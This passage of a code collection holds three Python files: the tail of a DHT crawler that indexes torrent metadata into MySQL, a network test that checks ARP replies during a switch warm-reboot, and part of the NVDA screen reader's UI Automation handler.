            if is_ip_allowed(address[0]):
                self.queue.put([address, infohash])

    def prepare_download_metadata(self):
        """Pop one info_hash, dedupe it and stage it in the cache queue."""
        if self.queue.qsize() == 0:
            sleep(2)
        # take an info_hash off the queue for downloading
        address, binhash = self.queue.get()
        if binhash in self.visited:
            return
        if len(self.visited) > 100000:  # reset the seen-set so it cannot grow unbounded
            self.visited = set()
        self.visited.add(binhash)
        # record the freshly visited info_hash
        info_hash = binhash.encode('hex')
        utcnow = datetime.datetime.utcnow()
        self.cache.put((address, binhash, utcnow))  # stage in the cache queue

    def download_metadata(self):
        """Flush the cache: bump counters for known hashes, download new ones."""
        if self.cache.qsize() > CACHE_LEN / 2:  # flush once the cache is half full
            while self.cache.qsize() > 0:  # drain the queue
                address, binhash, utcnow = self.cache.get()
                info_hash = binhash.encode('hex')
                self.dbcurr.execute('SELECT id FROM search_hash WHERE info_hash=%s', (info_hash,))
                y = self.dbcurr.fetchone()
                if y:
                    # known torrent: update last-seen time and request count
                    self.dbcurr.execute('UPDATE search_hash SET last_seen=%s, requests=requests+1 WHERE info_hash=%s', (utcnow, info_hash))
                else:
                    self.waitDownload.put((address, binhash))
            self.dbconn.commit()
        if self.waitDownload.qsize() > WAIT_DOWNLOAD:
            while self.waitDownload.qsize() > 0:
                address, binhash = self.waitDownload.get()
                t = threading.Thread(target=downloadTorrent.download_metadata, args=(address, binhash, self.metadata_queue))
                t.setDaemon(True)
                t.start()

    def decode(self, s):
        """Best-effort decode of `s`, trying the torrent's encoding then fallbacks."""
        if type(s) is list:
            s = ';'.join(s)
        u = s
        for x in (self.encoding, 'utf8', 'gbk', 'big5'):
            try:
                u = s.decode(x)
                return u
            except:
                pass
        return s.decode(self.encoding, 'ignore')

    def decode_utf8(self, d, i):
        """Prefer the '<key>.utf-8' variant of a bencoded field when present."""
        if i+'.utf-8' in d:
            return d[i+'.utf-8'].decode('utf8')
        return self.decode(d[i])

    def parse_metadata(self, data):  # parse a torrent
        """Parse raw bencoded metadata into a flat info dict, or None on failure."""
        info = {}
        self.encoding = 'utf8'
        try:
            torrent = bdecode(data)  # decode, then inspect
            if not torrent.get('name'):
                return None
        except:
            return None
        detail = torrent
        info['name'] = self.decode_utf8(detail, 'name')
        if 'files' in detail:
            info['files'] = []
            for x in detail['files']:
                if 'path.utf-8' in x:
                    v = {'path': self.decode('/'.join(x['path.utf-8'])), 'length': x['length']}
                else:
                    v = {'path': self.decode('/'.join(x['path'])), 'length': x['length']}
                if 'filehash' in x:
                    v['filehash'] = x['filehash'].encode('hex')
                info['files'].append(v)
            info['length'] = sum([x['length'] for x in info['files']])
        else:
            info['length'] = detail['length']
        info['data_hash'] = hashlib.md5(detail['pieces']).hexdigest()
        return info

    def got_torrent(self):
        """Take one downloaded torrent off the queue and insert it into MySQL."""
        if self.metadata_queue.qsize() == 0:
            return
        binhash, address, data,start_time = self.metadata_queue.get()
        if not data:
            return
        try:
            info = self.parse_metadata(data)
            if not info:
                return
        except:
            traceback.print_exc()
            return
        temp = time.time()
        x = time.localtime(float(temp))
        utcnow = time.strftime("%Y-%m-%d %H:%M:%S",x)  # get time now
        info_hash = binhash.encode('hex')  # magnet hash
        info['info_hash'] = info_hash
        # need to build tags
        info['tagged'] = False
        info['classified'] = False
        info['requests'] = 1
        info['last_seen'] = utcnow
        info['create_time'] = utcnow
        info['source_ip'] = address[0]
        if info.get('files'):
            files = [z for z in info['files'] if not z['path'].startswith('_')]
            if not files:
                files = info['files']
        else:
            files = [{'path': info['name'], 'length': info['length']}]
        files.sort(key=lambda z:z['length'], reverse=True)
        bigfname = files[0]['path']
        info['extension'] = metautils.get_extension(bigfname).lower()
        info['category'] = metautils.get_category(info['extension'])
        try:
            try:
                print '\n', 'Saved', info['info_hash'], info['name'], (time.time()-start_time), 's', address[0]
            except:
                print '\n', 'Saved', info['info_hash']
            ret = self.dbcurr.execute('INSERT INTO search_hash(info_hash,category,data_hash,name,extension,classified,source_ip,tagged,' +
                                      'length,create_time,last_seen,requests) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)',
                                      (info['info_hash'], info['category'], info['data_hash'], info['name'], info['extension'], info['classified'],
                                       info['source_ip'], info['tagged'], info['length'], info['create_time'], info['last_seen'], info['requests']))
            if self.count % 50 == 0 :
                self.dbconn.commit()
                if self.count > 100000:
                    self.count = 0
        except:
            print self.name, 'save error', self.name, info
            traceback.print_exc()
            return
if __name__ == "__main__":
    # start the metadata worker pool
    master = Master()
    master.start_work(150)
    # start the DHT server
    dht = DHTServer(master, "0.0.0.0", 6881, max_node_qsize=200)
    dht.start()
    dht.auto_send_find_node()
|
wr_arp.py | # This is Control Plane Assistent test for Warm-Reboot.
# The test first start Ferret server, implemented in Python. Then initiate Warm-Rebbot procedure.
# While the host in Warm-Reboot test continiously sending ARP request to the Vlan member ports and
# expect to receive ARP replies. The test will fail as soon as there is no replies for more than 25 seconds
# for one of the Vlan member ports
# To Run the test from the command line:
# ptf --test-dir 1 1.ArpTest --platform-dir ptftests --platform remote -t "config_file='/tmp/vxlan_decap.json';ferret_ip='10.64.246.21';dut_ssh='10.3.147.243';how_long=370"
#
import datetime
import json
import os
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback

from collections import defaultdict
from pprint import pprint
from Queue import Queue
import ptf
from ptf.base_tests import BaseTest
from ptf import config
from ptf.mask import Mask
import ptf.dataplane as dataplane
import ptf.testutils as testutils
from device_connection import DeviceConnection
import ipaddress
class ArpTest(BaseTest):
    """PTF test: keep ARPing every Vlan member port during a warm-reboot and
    fail if any port stays silent for more than 25 seconds."""

    def __init__(self):
        BaseTest.__init__(self)

        log_file_name = '/tmp/wr_arp_test.log'
        self.log_fp = open(log_file_name, 'a')
        self.log_fp.write("\nNew test:\n")

        # queues used to talk to the DUT-controlling thread (dut_thr)
        self.q_to_dut = Queue()
        self.q_from_dut = Queue()

        return

    def __del__(self):
        self.log_fp.close()

        return

    def log(self, message):
        """Print and persist a timestamped log line."""
        current_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print "%s : %s" % (current_time, message)
        self.log_fp.write("%s : %s\n" % (current_time, message))
        self.log_fp.flush()

        return

    def cmd(self, cmds):
        """Run a local command (list form, no shell); return (stdout, stderr, rc)."""
        process = subprocess.Popen(cmds,
                                   shell=False,
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        return_code = process.returncode

        return stdout, stderr, return_code

    def dut_exec_cmd(self, cmd):
        """Execute `cmd` on the DUT over ssh; returns (ok, output-or-error-text)."""
        self.log("Executing cmd='{}'".format(cmd))
        stdout, stderr, return_code = self.dut_connection.execCommand(cmd, timeout=30)
        self.log("return_code={}, stdout={}, stderr={}".format(return_code, stdout, stderr))
        if return_code == 0:
            return True, str(stdout)
        elif return_code == 255:
            # ssh session dropped — expected while the DUT warm-reboots
            return True, str(stdout)
        else:
            return False, "return code: %d. stdout = '%s' stderr = '%s'" % (return_code, str(stdout), str(stderr))

    def dut_thr(self, q_from, q_to):
        """Worker thread: serve 'WR' / 'uptime' / 'quit' requests against the DUT."""
        while True:
            cmd = q_from.get()
            if cmd == 'WR':
                self.log("Rebooting remote side")
                res, res_text = self.dut_exec_cmd("sudo warm-reboot -c {}".format(self.ferret_ip))
                if res:
                    q_to.put('ok: %s' % res_text)
                else:
                    q_to.put('error: %s' % res_text)
            elif cmd == 'uptime':
                self.log("Check uptime remote side")
                res, res_text = self.dut_exec_cmd("uptime -s")
                if res:
                    q_to.put('ok: %s' % res_text)
                else:
                    q_to.put('error: %s' % res_text)
            elif cmd == 'quit':
                q_to.put("done")
                break
            else:
                self.log('Unsupported cmd: %s' % cmd)
                q_to.put("error: unsupported cmd: %s" % cmd)
        self.log("Quiting from dut_thr")

        return

    def test_port_thr(self):
        """Worker thread: cycle ARP probes over all access ports until stop_at.

        The for/else ladders break out of all loop levels once the deadline
        is reached."""
        self.log("test_port_thr started")
        while True:
            for test in self.tests:
                self.log("Looping through tests: {}".format(test))
                for port in test['acc_ports']:
                    if time.time() > self.stop_at:
                        break
                    nr_rcvd = self.testPort(port)
                    self.records[port][time.time()] = nr_rcvd
                else:
                    continue
                break
            else:
                continue
            break
        self.log("Quiting from test_port_thr")

        return

    def readMacs(self):
        """Return {interface: mac} for every local network interface."""
        addrs = {}
        for intf in os.listdir('/sys/class/net'):
            if os.path.isdir('/sys/class/net/%s' % intf):
                with open('/sys/class/net/%s/address' % intf) as fp:
                    addrs[intf] = fp.read().strip()

        return addrs

    def generate_VlanPrefixes(self, gw, prefixlen, acc_ports):
        """Assign a unique host IP inside gw/prefixlen to every access port."""
        res = {}
        n_hosts = 2**(32 - prefixlen) - 3
        nr_of_dataplane_ports = len(self.dataplane.ports)

        if nr_of_dataplane_ports > n_hosts:
            raise Exception("The prefix len size is too small for the test")

        gw_addr_n = struct.unpack(">I", socket.inet_aton(gw))[0]
        mask = (2**32 - 1) ^ (2**(32 - prefixlen) - 1)
        net_addr_n = gw_addr_n & mask

        addr = 1
        for port in acc_ports:
            while True:
                host_addr_n = net_addr_n + addr
                host_ip = socket.inet_ntoa(struct.pack(">I", host_addr_n))
                if host_ip != gw:
                    break
                else:
                    addr += 1  # skip gw
            res[port] = host_ip
            addr += 1

        return res

    def generatePkts(self, gw, port_ip, port_mac, vlan_id):
        """Build the ARP request to send and a mask for the expected reply."""
        pkt = testutils.simple_arp_packet(
                      ip_snd=port_ip,
                      ip_tgt=gw,
                      eth_src=port_mac,
                      hw_snd=port_mac,
                      vlan_vid=vlan_id
                  )
        exp_pkt = testutils.simple_arp_packet(
                      ip_snd=gw,
                      ip_tgt=port_ip,
                      eth_src=self.dut_mac,
                      eth_dst=port_mac,
                      hw_snd=self.dut_mac,
                      hw_tgt=port_mac,
                      arp_op=2,
                      vlan_vid=vlan_id
                  )
        masked_exp_pkt = Mask(exp_pkt)
        # Ignore the Ethernet padding zeros
        masked_exp_pkt.set_ignore_extra_bytes()

        return pkt, masked_exp_pkt

    def generatePackets(self):
        """Pre-build (request, expected-reply) packet pairs for every port."""
        self.gen_pkts = {}
        for test in self.tests:
            for port in test['acc_ports']:
                gw = test['vlan_gw']
                port_ip = test['vlan_ip_prefixes'][port]
                port_mac = self.ptf_mac_addrs['eth%d' % port]
                tagging_mode = test['tagging_mode'][port]
                if tagging_mode == 'tagged':
                    vlan_id = test['vlan_id']
                else:
                    vlan_id = 0
                self.gen_pkts[port] = self.generatePkts(gw, port_ip, port_mac, vlan_id)

        return

    def get_param(self, param_name, required=True, default = None):
        """Fetch a ptf test parameter; raise when a required one is missing."""
        params = testutils.test_params_get()
        if param_name not in params:
            if required:
                raise Exception("required parameter '%s' is not presented" % param_name)
            else:
                return default
        else:
            return params[param_name]

    def setUp(self):
        """Read parameters and config, derive per-vlan test data, restart ferret."""
        self.dataplane = ptf.dataplane_instance
        config = self.get_param('config_file')

        self.ferret_ip = self.get_param('ferret_ip')
        self.dut_ssh = self.get_param('dut_ssh')
        self.dut_username = self.get_param('dut_username')
        self.dut_password = self.get_param('dut_password')
        self.dut_alt_password=self.get_param('alt_password')
        self.dut_connection = DeviceConnection(self.dut_ssh,
                                               username=self.dut_username,
                                               password=self.dut_password,
                                               alt_password=self.dut_alt_password)
        self.how_long = int(self.get_param('how_long', required=False, default=300))

        if not os.path.isfile(config):
            raise Exception("the config file %s doesn't exist" % config)

        with open(config) as fp:
            graph = json.load(fp)

        self.tests = []
        vni_base = 0
        for vlan, config in graph['vlan_facts'].items():
            test = {}
            test['acc_ports'] = []
            test['tagging_mode'] = {}
            for member, mode in config['members'].items():
                ptf_port_idx = graph['minigraph_port_indices'][member]
                test['acc_ports'].append(ptf_port_idx)
                test['tagging_mode'].update(
                    {
                        ptf_port_idx: mode['tagging_mode']
                    }
                )
            test['vlan_id'] = int(config['vlanid'])
            test['vni'] = vni_base + test['vlan_id']

            prefixlen = None
            # pick the first IPv4 interface as the gateway for this vlan
            for d in config['interfaces']:
                if sys.version_info < (3, 0):
                    ip = ipaddress.ip_address(d['addr'].decode('utf8'))
                else:
                    ip = ipaddress.ip_address(d['addr'])
                if ip.version == 4:
                    test['vlan_gw'] = d['addr']
                    prefixlen = int(d['prefixlen'])
                    test['vlan_ip_prefixes'] = self.generate_VlanPrefixes(d['addr'], prefixlen, test['acc_ports'])
                    break
            else:
                raise Exception("No invalid IPv4 address found for Vlan '%s'" % vlan)

            self.tests.append(test)

        self.dut_mac = graph['dut_mac']

        self.ptf_mac_addrs = self.readMacs()

        self.generatePackets()

        self.cmd(["supervisorctl", "restart", "ferret"])

        self.dataplane.flush()

        return

    def tearDown(self):
        self.cmd(["supervisorctl", "stop", "ferret"])

        return

    def runTest(self):
        """Drive the warm-reboot while a sender thread measures ARP reply gaps."""
        print
        thr = threading.Thread(target=self.dut_thr, kwargs={'q_from': self.q_to_dut, 'q_to': self.q_from_dut})
        thr.setDaemon(True)
        thr.start()

        uptime_before = self.req_dut('uptime')
        if uptime_before.startswith('error'):
            self.log("DUT returned error for first uptime request")
            self.req_dut('quit')
            self.assertTrue(False, "DUT returned error for first uptime request")

        self.records = defaultdict(dict)

        self.stop_at = time.time() + self.how_long
        test_port_thr = threading.Thread(target=self.test_port_thr)
        test_port_thr.setDaemon(True)
        test_port_thr.start()

        self.log("Issuing WR command")
        result = self.req_dut('WR')
        if result.startswith('ok'):
            self.log("WR OK!")
        else:
            self.log("Error in WR")
            self.req_dut('quit')
            self.assertTrue(False, "Error in WR")
        self.assertTrue(time.time() < self.stop_at, "warm-reboot took to long")

        test_port_thr.join(timeout=self.how_long)
        if test_port_thr.isAlive():
            self.log("Timed out waiting for traffic-sender (test_port_thr thread)")
            self.req_dut('quit')
            self.assertTrue(False, "Timed out waiting for traffic-sender (test_port_thr thread)")

        uptime_after = self.req_dut('uptime')
        if uptime_after.startswith('error'):
            self.log("DUT returned error for second uptime request")
            self.req_dut('quit')
            self.assertTrue(False, "DUT returned error for second uptime request")

        self.req_dut('quit')

        if uptime_before == uptime_after:
            self.log("The DUT wasn't rebooted. Uptime: %s vs %s" % (uptime_before, uptime_after))
            self.assertTrue(uptime_before != uptime_after, "The DUT wasn't rebooted. Uptime: %s vs %s" % (uptime_before, uptime_after))

        # check that every port didn't have pauses more than 25 seconds
        pauses = defaultdict(list)
        for port, data in self.records.items():
            was_active = True
            last_inactive = None
            for t in sorted(data.keys()):
                active = data[t] > 0
                if was_active and not active:
                    last_inactive = t
                elif not was_active and active:
                    pauses[port].append(t - last_inactive)
                was_active = active
            if not was_active:
                pauses[port].append(sorted(data.keys())[-1] - last_inactive)

        m_pauses = { port:max(pauses[port]) for port in pauses.keys() if max(pauses[port]) > 25 }
        for port in m_pauses.keys():
            self.log("Port eth%d. Max pause in arp_response %d sec" % (port, int(m_pauses[port])))
        print
        sys.stdout.flush()

        self.assertTrue(len(m_pauses) == 0, "Too long pauses in arp responses")

        return

    def testPort(self, port):
        """Send one ARP request on `port`; return the number of replies seen."""
        pkt, exp_pkt = self.gen_pkts[port]
        testutils.send_packet(self, port, pkt)
        nr_rcvd = testutils.count_matched_packets(self, exp_pkt, port, timeout=0.2)

        return nr_rcvd

    def req_dut(self, cmd):
        """Send `cmd` to the DUT thread and wait for its reply string."""
        self.log("cmd: %s" % cmd)
        self.q_to_dut.put(cmd)
        reply = self.q_from_dut.get()
        self.log("reply: %s" % reply)

        return reply
|
_UIAHandler.py | #_UIAHandler.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2011-2018 NV Access Limited, Joseph Lee, Babbage B.V.
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from ctypes import *
from ctypes.wintypes import *
import comtypes.client
from comtypes.automation import VT_EMPTY
from comtypes import *
import weakref
import threading
import time
import config
import api
import appModuleHandler
import queueHandler
import controlTypes
import NVDAHelper
import winKernel
import winUser
import eventHandler
from logHandler import log
import UIAUtils
from comtypes.gen.UIAutomationClient import *
#Some newer UIA constants that could be missing
# (i.e. not yet present in the comtypes-generated UIAutomationClient module).
ItemIndex_Property_GUID=GUID("{92A053DA-2969-4021-BF27-514CFC2E4A69}")
ItemCount_Property_GUID=GUID("{ABBF5C45-5CCC-47b7-BB4E-87CB87BBD162}")
# Possible values of the UIA HorizontalTextAlignment text attribute.
HorizontalTextAlignment_Left=0
HorizontalTextAlignment_Centered=1
HorizontalTextAlignment_Right=2
HorizontalTextAlignment_Justified=3
# The name of the WDAG (Windows Defender Application Guard) process
WDAG_PROCESS_NAME=u'hvsirdpclient'
# Window class names that are always treated as natively UIA,
# checked first in UIAHandler._isUIAWindowHelper.
goodUIAWindowClassNames=[
	# A WDAG (Windows Defender Application Guard) Window is always native UIA, even if it doesn't report as such.
	'RAIL_WINDOW',
]
# Window class names whose UIA implementations are known to be bad;
# NVDA avoids UIA for these (see UIAHandler._isUIAWindowHelper).
badUIAWindowClassNames=[
	"SysTreeView32",
	"WuDuiListView",
	"ComboBox",
	"msctls_progress32",
	"Edit",
	"CommonPlacesWrapperWndClass",
	"SysMonthCal32",
	"SUPERGRID", #Outlook 2010 message list
	"RichEdit",
	"RichEdit20",
	"RICHEDIT50W",
	"SysListView32",
	"EXCEL7",
	"Button",
	# #7497: Windows 10 Fall Creators Update has an incomplete UIA implementation for console windows, therefore for now we should ignore it.
	# It does not implement caret/selection, and probably has no new text events.
	"ConsoleWindowClass",
]
# #8405: used to detect UIA dialogs prior to Windows 10 RS5.
UIADialogClassNames=[
	"#32770",
	"NUIDialog",
	"Credential Dialog Xaml Host", # UAC dialog in Anniversary Update and later
	"Shell_Dialog",
	"Shell_Flyout",
	"Shell_SystemDialog", # Various dialogs in Windows 10 Settings app
]
# Maps NVDA text movement unit names to UIA TextUnit constants.
NVDAUnitsToUIAUnits={
	"character":TextUnit_Character,
	"word":TextUnit_Word,
	"line":TextUnit_Line,
	"paragraph":TextUnit_Paragraph,
	"readingChunk":TextUnit_Line,
}
# Maps UIA control type IDs to the corresponding NVDA control roles.
UIAControlTypesToNVDARoles={
	UIA_ButtonControlTypeId:controlTypes.ROLE_BUTTON,
	UIA_CalendarControlTypeId:controlTypes.ROLE_CALENDAR,
	UIA_CheckBoxControlTypeId:controlTypes.ROLE_CHECKBOX,
	UIA_ComboBoxControlTypeId:controlTypes.ROLE_COMBOBOX,
	UIA_EditControlTypeId:controlTypes.ROLE_EDITABLETEXT,
	UIA_HyperlinkControlTypeId:controlTypes.ROLE_LINK,
	UIA_ImageControlTypeId:controlTypes.ROLE_GRAPHIC,
	UIA_ListItemControlTypeId:controlTypes.ROLE_LISTITEM,
	UIA_ListControlTypeId:controlTypes.ROLE_LIST,
	UIA_MenuControlTypeId:controlTypes.ROLE_POPUPMENU,
	UIA_MenuBarControlTypeId:controlTypes.ROLE_MENUBAR,
	UIA_MenuItemControlTypeId:controlTypes.ROLE_MENUITEM,
	UIA_ProgressBarControlTypeId:controlTypes.ROLE_PROGRESSBAR,
	UIA_RadioButtonControlTypeId:controlTypes.ROLE_RADIOBUTTON,
	UIA_ScrollBarControlTypeId:controlTypes.ROLE_SCROLLBAR,
	UIA_SliderControlTypeId:controlTypes.ROLE_SLIDER,
	UIA_SpinnerControlTypeId:controlTypes.ROLE_SPINBUTTON,
	UIA_StatusBarControlTypeId:controlTypes.ROLE_STATUSBAR,
	UIA_TabControlTypeId:controlTypes.ROLE_TABCONTROL,
	UIA_TabItemControlTypeId:controlTypes.ROLE_TAB,
	UIA_TextControlTypeId:controlTypes.ROLE_STATICTEXT,
	UIA_ToolBarControlTypeId:controlTypes.ROLE_TOOLBAR,
	UIA_ToolTipControlTypeId:controlTypes.ROLE_TOOLTIP,
	UIA_TreeControlTypeId:controlTypes.ROLE_TREEVIEW,
	UIA_TreeItemControlTypeId:controlTypes.ROLE_TREEVIEWITEM,
	UIA_CustomControlTypeId:controlTypes.ROLE_UNKNOWN,
	UIA_GroupControlTypeId:controlTypes.ROLE_GROUPING,
	UIA_ThumbControlTypeId:controlTypes.ROLE_THUMB,
	UIA_DataGridControlTypeId:controlTypes.ROLE_DATAGRID,
	UIA_DataItemControlTypeId:controlTypes.ROLE_DATAITEM,
	UIA_DocumentControlTypeId:controlTypes.ROLE_DOCUMENT,
	UIA_SplitButtonControlTypeId:controlTypes.ROLE_SPLITBUTTON,
	UIA_WindowControlTypeId:controlTypes.ROLE_WINDOW,
	UIA_PaneControlTypeId:controlTypes.ROLE_PANE,
	UIA_HeaderControlTypeId:controlTypes.ROLE_HEADER,
	UIA_HeaderItemControlTypeId:controlTypes.ROLE_HEADERITEM,
	UIA_TableControlTypeId:controlTypes.ROLE_TABLE,
	UIA_TitleBarControlTypeId:controlTypes.ROLE_TITLEBAR,
	UIA_SeparatorControlTypeId:controlTypes.ROLE_SEPARATOR,
}
# Maps UIA property IDs (watched via AddPropertyChangedEventHandler)
# to the NVDA event names queued when the property changes.
UIAPropertyIdsToNVDAEventNames={
	UIA_NamePropertyId:"nameChange",
	UIA_HelpTextPropertyId:"descriptionChange",
	UIA_ExpandCollapseExpandCollapseStatePropertyId:"stateChange",
	UIA_ToggleToggleStatePropertyId:"stateChange",
	UIA_IsEnabledPropertyId:"stateChange",
	UIA_ValueValuePropertyId:"valueChange",
	UIA_RangeValueValuePropertyId:"valueChange",
	UIA_ControllerForPropertyId:"UIA_controllerFor",
}
# Maps UIA automation event IDs (registered via addAutomationEventHandler)
# to the NVDA event names queued when the event fires.
# Commented-out entries are deliberately disabled mappings.
UIAEventIdsToNVDAEventNames={
	UIA_LiveRegionChangedEventId:"liveRegionChange",
	#UIA_Text_TextChangedEventId:"textChanged",
	UIA_SelectionItem_ElementSelectedEventId:"UIA_elementSelected",
	UIA_MenuOpenedEventId:"gainFocus",
	UIA_SelectionItem_ElementAddedToSelectionEventId:"stateChange",
	UIA_SelectionItem_ElementRemovedFromSelectionEventId:"stateChange",
	#UIA_MenuModeEndEventId:"menuModeEnd",
	#UIA_Text_TextSelectionChangedEventId:"caret",
	UIA_ToolTipOpenedEventId:"UIA_toolTipOpened",
	#UIA_AsyncContentLoadedEventId:"documentLoadComplete",
	#UIA_ToolTipClosedEventId:"hide",
	UIA_Window_WindowOpenedEventId:"UIA_window_windowOpen",
	UIA_SystemAlertEventId:"UIA_systemAlert",
}
class UIAHandler(COMObject):
	"""NVDA's UI Automation client.
	Creates the UIA client object on a dedicated MTA thread, registers itself
	as the COM handler for focus, property, automation and (where available)
	notification events, and translates them into NVDA events queued via
	eventHandler. Also decides, per window, whether UIA should be used at all.
	"""
	_com_interfaces_=[IUIAutomationEventHandler,IUIAutomationFocusChangedEventHandler,IUIAutomationPropertyChangedEventHandler,IUIAutomationNotificationEventHandler]
	def __init__(self):
		"""Start the MTA worker thread and wait (up to 2 seconds) for UIA to initialise.
		Re-raises any exception the worker recorded during initialisation.
		"""
		super(UIAHandler,self).__init__()
		self.MTAThreadInitEvent=threading.Event()
		self.MTAThreadStopEvent=threading.Event()
		self.MTAThreadInitException=None
		self.MTAThread=threading.Thread(target=self.MTAThreadFunc)
		self.MTAThread.daemon=True
		self.MTAThread.start()
		# Bounded wait so a hung UIA initialisation cannot block start-up forever.
		self.MTAThreadInitEvent.wait(2)
		if self.MTAThreadInitException:
			raise self.MTAThreadInitException
	def terminate(self):
		"""Signal the MTA thread to stop and wait briefly for it to exit."""
		MTAThreadHandle=HANDLE(windll.kernel32.OpenThread(winKernel.SYNCHRONIZE,False,self.MTAThread.ident))
		self.MTAThreadStopEvent.set()
		#Wait for the MTA thread to die (while still message pumping)
		if windll.user32.MsgWaitForMultipleObjects(1,byref(MTAThreadHandle),False,200,0)!=0:
			log.debugWarning("Timeout or error while waiting for UIAHandler MTA thread")
		windll.kernel32.CloseHandle(MTAThreadHandle)
		del self.MTAThread
	def MTAThreadFunc(self):
		"""Worker-thread body: initialise COM (multithreaded), create the UIA
		client object, build tree walkers / cache requests, register all event
		handlers, then block until MTAThreadStopEvent is set.
		Any initialisation failure is stored in MTAThreadInitException so that
		__init__ can re-raise it on the calling thread.
		"""
		try:
			oledll.ole32.CoInitializeEx(None,comtypes.COINIT_MULTITHREADED)
			isUIA8=False
			try:
				self.clientObject=CoCreateInstance(CUIAutomation8._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
				isUIA8=True
			except (COMError,WindowsError,NameError):
				# CUIAutomation8 is unavailable (e.g. pre-Windows 8); fall back to the original coclass.
				self.clientObject=CoCreateInstance(CUIAutomation._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
			if isUIA8:
				# #8009: use appropriate interface based on highest supported interface.
				# #8338: made easier by traversing interfaces supported on Windows 8 and later in reverse.
				for interface in reversed(CUIAutomation8._com_interfaces_):
					try:
						self.clientObject=self.clientObject.QueryInterface(interface)
						break
					except COMError:
						pass
				# Windows 10 RS5 provides new performance features for UI Automation including event coalescing and connection recovery.
				# Enable all of these where available.
				if isinstance(self.clientObject,IUIAutomation6):
					self.clientObject.CoalesceEvents=CoalesceEventsOptions_Enabled
					self.clientObject.ConnectionRecoveryBehavior=ConnectionRecoveryBehaviorOptions_Enabled
			log.info("UIAutomation: %s"%self.clientObject.__class__.__mro__[1].__name__)
			# Walker that stops at the nearest element with a native window handle
			# (condition: NOT (NativeWindowHandle == 0)).
			self.windowTreeWalker=self.clientObject.createTreeWalker(self.clientObject.CreateNotCondition(self.clientObject.CreatePropertyCondition(UIA_NativeWindowHandlePropertyId,0)))
			self.windowCacheRequest=self.clientObject.CreateCacheRequest()
			self.windowCacheRequest.AddProperty(UIA_NativeWindowHandlePropertyId)
			# Per-hwnd cache of (isUIAWindow result, timestamp); see isUIAWindow.
			self.UIAWindowHandleCache={}
			self.baseTreeWalker=self.clientObject.RawViewWalker
			self.baseCacheRequest=self.windowCacheRequest.Clone()
			# NOTE(review): module self-import; appears unused in this function -- confirm before removing.
			import UIAHandler
			# Register NVDA's custom UIA properties (implemented in NVDAHelper).
			self.ItemIndex_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemIndex_Property_GUID),u"ItemIndex",1)
			self.ItemCount_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemCount_Property_GUID),u"ItemCount",1)
			for propertyId in (UIA_FrameworkIdPropertyId,UIA_AutomationIdPropertyId,UIA_ClassNamePropertyId,UIA_ControlTypePropertyId,UIA_ProviderDescriptionPropertyId,UIA_ProcessIdPropertyId,UIA_IsTextPatternAvailablePropertyId,UIA_IsContentElementPropertyId,UIA_IsControlElementPropertyId):
				self.baseCacheRequest.addProperty(propertyId)
			self.baseCacheRequest.addPattern(UIA_TextPatternId)
			self.rootElement=self.clientObject.getRootElementBuildCache(self.baseCacheRequest)
			self.reservedNotSupportedValue=self.clientObject.ReservedNotSupportedValue
			self.ReservedMixedAttributeValue=self.clientObject.ReservedMixedAttributeValue
			self.clientObject.AddFocusChangedEventHandler(self.baseCacheRequest,self)
			self.clientObject.AddPropertyChangedEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self,UIAPropertyIdsToNVDAEventNames.keys())
			# NOTE: iterkeys is Python 2 only.
			for x in UIAEventIdsToNVDAEventNames.iterkeys():
				self.clientObject.addAutomationEventHandler(x,self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
			# #7984: add support for notification event (IUIAutomation5, part of Windows 10 build 16299 and later).
			if isinstance(self.clientObject, IUIAutomation5):
				self.clientObject.AddNotificationEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
		except Exception as e:
			self.MTAThreadInitException=e
		finally:
			# Always release __init__, even on failure, so it doesn't wait the full timeout.
			self.MTAThreadInitEvent.set()
		self.MTAThreadStopEvent.wait()
		self.clientObject.RemoveAllEventHandlers()
	def IUIAutomationEventHandler_HandleAutomationEvent(self,sender,eventID):
		"""COM callback: translate a UIA automation event into an NVDA event
		(per UIAEventIdsToNVDAEventNames) and queue it, after filtering.
		"""
		if not self.MTAThreadInitEvent.isSet():
			# UIAHandler hasn't finished initialising yet, so just ignore this event.
			return
		if eventID==UIA_MenuOpenedEventId and eventHandler.isPendingEvents("gainFocus"):
			# We don't need the menuOpened event if focus has been fired,
			# as focus should be more correct.
			return
		NVDAEventName=UIAEventIdsToNVDAEventNames.get(eventID,None)
		if not NVDAEventName:
			return
		if not self.isNativeUIAElement(sender):
			return
		window=self.getNearestWindowHandle(sender)
		if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
			return
		import NVDAObjects.UIA
		obj=NVDAObjects.UIA.UIA(UIAElement=sender)
		if (
			not obj
			or (NVDAEventName=="gainFocus" and not obj.shouldAllowUIAFocusEvent)
			or (NVDAEventName=="liveRegionChange" and not obj._shouldAllowUIALiveRegionChangeEvent)
		):
			return
		# Re-use the existing focus object when the event targets the focus.
		focus=api.getFocusObject()
		if obj==focus:
			obj=focus
		eventHandler.queueEvent(NVDAEventName,obj)
	def IUIAutomationFocusChangedEventHandler_HandleFocusChangedEvent(self,sender):
		"""COM callback: queue a gainFocus NVDA event for a UIA focus change,
		filtering duplicates and non-native elements.
		"""
		if not self.MTAThreadInitEvent.isSet():
			# UIAHandler hasn't finished initialising yet, so just ignore this event.
			return
		if not self.isNativeUIAElement(sender):
			return
		import NVDAObjects.UIA
		if isinstance(eventHandler.lastQueuedFocusObject,NVDAObjects.UIA.UIA):
			lastFocus=eventHandler.lastQueuedFocusObject.UIAElement
			# Ignore duplicate focus events.
			# It seems that it is possible for compareElements to return True, even though the objects are different.
			# Therefore, don't ignore the event if the last focus object has lost its hasKeyboardFocus state.
			if self.clientObject.compareElements(sender,lastFocus) and lastFocus.currentHasKeyboardFocus:
				return
		window=self.getNearestWindowHandle(sender)
